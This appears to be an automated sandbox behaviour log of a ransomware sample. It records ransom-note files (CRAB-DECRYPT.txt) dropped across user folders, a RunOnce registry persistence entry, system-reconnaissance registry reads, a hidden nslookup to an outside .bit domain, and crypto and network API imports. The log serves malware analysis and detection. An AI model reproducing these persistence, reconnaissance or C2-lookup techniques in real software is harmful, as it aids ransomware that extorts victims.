Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\3Y244KAF\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\ASF6K8JF\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\M2CKLQNS\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\ZH5Q7INF\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
For performance reasons, the remaining 810 entries are omitted.
The remaining entries can be found in glog.xml.
Registry (28)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_CURRENT_USER\Control Panel\International - True 1
Fn
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_CURRENT_USER\Control Panel\International value_name = LocaleName, data = 101 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = productName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Write Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce value_name = wyzftwkvewc, data = "C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe", size = 88, type = REG_SZ True 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create nslookup politiaromana.bit ns1.virmach.ru os_pid = 0xd48, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Module (1681)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x74120000 True 3
Fn
Load KERNEL32.dll base_address = 0x74120000 True 2
Fn
Load msvcr100.dll base_address = 0x6f970000 True 1
Fn
Load USER32.dll base_address = 0x76840000 True 1
Fn
Load GDI32.dll base_address = 0x764e0000 True 1
Fn
Load ADVAPI32.dll base_address = 0x76dc0000 True 1
Fn
Load SHELL32.dll base_address = 0x750e0000 True 1
Fn
Load CRYPT32.dll base_address = 0x74c50000 True 1
Fn
Load WININET.dll base_address = 0x6fdc0000 True 1
Fn
Load PSAPI.DLL base_address = 0x74560000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x74120000 True 12
Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x76e90000 True 5
Fn
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x76dc0000 True 701
Fn
Get Filename - process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 256 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x7413a980 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x74137570 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x74139e30 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x74144ff0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x76eef730 True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x76eed830 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x74139950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x74137a50 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x74144bf0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x74137810 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x74137600 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x7413a700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x74145100 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x74147b30 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x74138bf0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x74137990 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitThread, address_out = 0x76ef7a80 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x74133870 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x74146630 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x74147020 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x74146c50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x74162430 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x7413ab60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x74132af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x74131b90 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x7413a2b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x741378b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x74132ad0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x74133880 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x74137710 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x7413a6e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x74146aa0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x76ee0e60 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x7413a740 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x7413a720 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x74146ca0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x74139b00 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x741338a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x741323e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x74137620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x7413aac0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x7413a7e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x7413b0b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x74139bf0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x74162670 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x7413a940 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x74146730 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x741338c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x7413a120 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x74131b70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x741329d0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x7413a040 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x74139bc0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x76ecf290 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x76ecf210 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x74131ba0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x7413a790 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x74138500 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x74145140 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x7413a290 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x74137930 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x74138c10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x741619a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x76ec2bd0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x76ebefe0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x74137950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x76ebbb20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x74139f30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x741469b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x74146f60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x74146f70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x74146890 True 2
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x6f98c544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x74146740 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x741466a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x74146700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x7413b040 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x7413ace0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x76ed7dc0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x76ee4010 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x76ee2a50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x7413a7b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x76ee2290 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x76ee2910 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x76f07a60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x76efac00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x76eea890 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x7413ac80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x74160830 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x767f6270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x7413fe80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x7413ff80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x74160e00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x7413a750 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x74161240 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x7413ad60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x74161460 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x74139a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x7677ded0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x74133630 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x74146bb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x74146c40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileAttributesW, address_out = 0x74146a50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x7413b1d0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x7415d260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileAttributesW, address_out = 0x74146c20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexW, address_out = 0x741466f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x74146a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VerSetConditionMask, address_out = 0x76ef1a40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x74146820 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x74145eb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSection, address_out = 0x76eea200 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x74139fd0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateThread, address_out = 0x74140160 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VerifyVersionInfoW, address_out = 0x74138c30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForMultipleObjects, address_out = 0x74146800 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsW, address_out = 0x7413cd50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x74133690 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleInformation, address_out = 0x74146660 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x7413f640 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreatePipe, address_out = 0x74130540 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiA, address_out = 0x74137830 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x7413d290 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x74147b50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x74146960 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x74137970 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x741468e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x741469a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x7413ac70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x741446a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDiskFreeSpaceW, address_out = 0x741469f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetWindowsDirectoryW, address_out = 0x74145120 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumeInformationW, address_out = 0x74146b60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiW, address_out = 0x74137590 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x74139b90 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x7415d170 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileMappingW, address_out = 0x741399b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnmapViewOfFile, address_out = 0x74139b20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MapViewOfFile, address_out = 0x74138d60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x74146a70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableW, address_out = 0x74139970 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x7413ea30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x741399f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x7413f5a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTempPathW, address_out = 0x74146b30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x74138c80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x7413b000 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x76878a60 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfW, address_out = 0x7686f890 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x7685d9b0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x7685abd0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadIconW, address_out = 0x7685a740 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x768bfec0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x76874f60 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x76878a80 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x768792b0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x76859580 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x76878e60 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x76859860 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x76855d90 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x768562e0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x76f1aee0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x768683a0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x768704a0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetForegroundWindow, address_out = 0x76878cb0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowLongW, address_out = 0x76853780 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = TextOutW, address_out = 0x76588830 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = FreeSid, address_out = 0x76de0440 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x76ddf7f0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x76ddfa20 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x76ddf620 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptExportKey, address_out = 0x76ddfb30 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x76de0590 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetKeyParam, address_out = 0x76df6bf0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x76de0650 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x76ddfaf0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x76df6b30 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGenKey, address_out = 0x76de3910 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyKey, address_out = 0x76de0400 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x76de1030 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x76ddf330 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x76ddf350 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AllocateAndInitializeSid, address_out = 0x76ddf660 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x7527d9f0 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderPathW, address_out = 0x7528f9c0 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x7527e690 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x74c6d6d0 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptBinaryToStringA, address_out = 0x74c6e0f0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x6fe8d200 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpAddRequestHeadersW, address_out = 0x6fe3bec0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpSendRequestW, address_out = 0x6fe86ef0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetConnectW, address_out = 0x6fe745f0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpOpenRequestW, address_out = 0x6fe40fd0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x6fe88490 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x6fe47320 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumDeviceDrivers, address_out = 0x74561340 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetDeviceDriverBaseNameW, address_out = 0x745613a0 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlComputeCrc32, address_out = 0x76f5d9b0 True 5
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGenRandom, address_out = 0x76de10a0 True 701
Fn
Driver (253)
»
Operation Driver Additional Information Success Count Logfile
Enumerate - load_addresses = 1703688 True 2
Fn
Enumerate - load_addresses = 4784128 True 2
Fn
Get Name - load_address = 3483488256 True 2
Fn
Get Name - load_address = 3491663872 True 2
Fn
Get Name - load_address = 3467825152 True 2
Fn
Get Name - load_address = 1801781248 True 2
Fn
Get Name - load_address = 1802371072 True 2
Fn
Get Name - load_address = 1802436608 True 2
Fn
Get Name - load_address = 1802895360 True 2
Fn
Get Name - load_address = 1803091968 True 2
Fn
Get Name - load_address = 1803223040 True 2
Fn
Get Name - load_address = 1803288576 True 2
Fn
Get Name - load_address = 1803354112 True 2
Fn
Get Name - load_address = 1797259264 True 2
Fn
Get Name - load_address = 1797914624 True 2
Fn
Get Name - load_address = 1798307840 True 2
Fn
Get Name - load_address = 1798766592 True 2
Fn
Get Name - load_address = 1798963200 True 2
Fn
Get Name - load_address = 1799684096 True 2
Fn
Get Name - load_address = 1800536064 True 2
Fn
Get Name - load_address = 1800667136 True 2
Fn
Get Name - load_address = 1800863744 True 2
Fn
Get Name - load_address = 1800929280 True 2
Fn
Get Name - load_address = 1819148288 True 2
Fn
Get Name - load_address = 1819738112 True 2
Fn
Get Name - load_address = 1819803648 True 2
Fn
Get Name - load_address = 1819934720 True 2
Fn
Get Name - load_address = 1820000256 True 2
Fn
Get Name - load_address = 1820131328 True 2
Fn
Get Name - load_address = 1803550720 True 2
Fn
Get Name - load_address = 1803943936 True 2
Fn
Get Name - load_address = 1804075008 True 2
Fn
Get Name - load_address = 1804206080 True 2
Fn
Get Name - load_address = 1804337152 True 2
Fn
Get Name - load_address = 1804533760 True 2
Fn
Get Name - load_address = 1805123584 True 2
Fn
Get Name - load_address = 1805254656 True 2
Fn
